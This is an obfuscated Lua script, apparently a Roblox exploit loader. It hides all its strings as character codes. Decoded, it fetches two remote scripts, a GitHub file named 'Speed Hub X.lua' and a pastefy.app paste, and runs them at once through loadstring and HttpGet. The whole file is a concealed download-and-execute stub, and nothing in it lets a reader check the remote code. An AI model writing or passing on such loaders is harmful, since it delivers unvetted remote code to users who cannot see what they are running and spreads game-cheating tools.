local a = string.char
local b = getfenv()[a(108)..a(111)..a(97)..a(100)..a(115)..a(116)..a(114)..a(105)..a(110)..a(103)]
local c = getfenv()[a(103)..a(97)..a(109)..a(101)]
local d = a(72)..a(116)..a(116)..a(112)..a(71)..a(101)..a(116)


local url1 = a(104)..a(116)..a(116)..a(112)..a(115)..a(58)..a(47)..a(47)
  ..a(114)..a(97)..a(119)..a(46)..a(103)..a(105)..a(116)..a(104)..a(117)
  ..a(98)..a(117)..a(115)..a(101)..a(114)..a(99)..a(111)..a(110)..a(116)
  ..a(101)..a(110)..a(116)..a(46)..a(99)..a(111)..a(109)..a(47)
  ..a(65)..a(104)..a(109)..a(97)..a(100)..a(86)..a(57)..a(57)
  ..a(47)..a(83)..a(112)..a(101)..a(101)..a(100)..a(45)..a(72)
  ..a(117)..a(98)..a(45)..a(88)..a(47)..a(109)..a(97)..a(105)
  ..a(110)..a(47)..a(83)..a(112)..a(101)..a(101)..a(100)..a(37)
  ..a(50)..a(48)..a(72)..a(117)..a(98)..a(37)..a(50)..a(48)
  ..a(88)..a(46)..a(108)..a(117)..a(97)


local url2 = a(104)..a(116)..a(116)..a(112)..a(115)..a(58)..a(47)..a(47)
  ..a(112)..a(97)..a(115)..a(116)..a(101)..a(102)..a(121)..a(46)..a(97)
  ..a(112)..a(112)..a(47)..a(82)..a(97)..a(81)..a(55)..a(120)..a(48)
  ..a(114)..a(78)..a(47)..a(114)..a(97)..a(119)


b(c[d](c, url1, true))()
b(c[d](c, url2))()
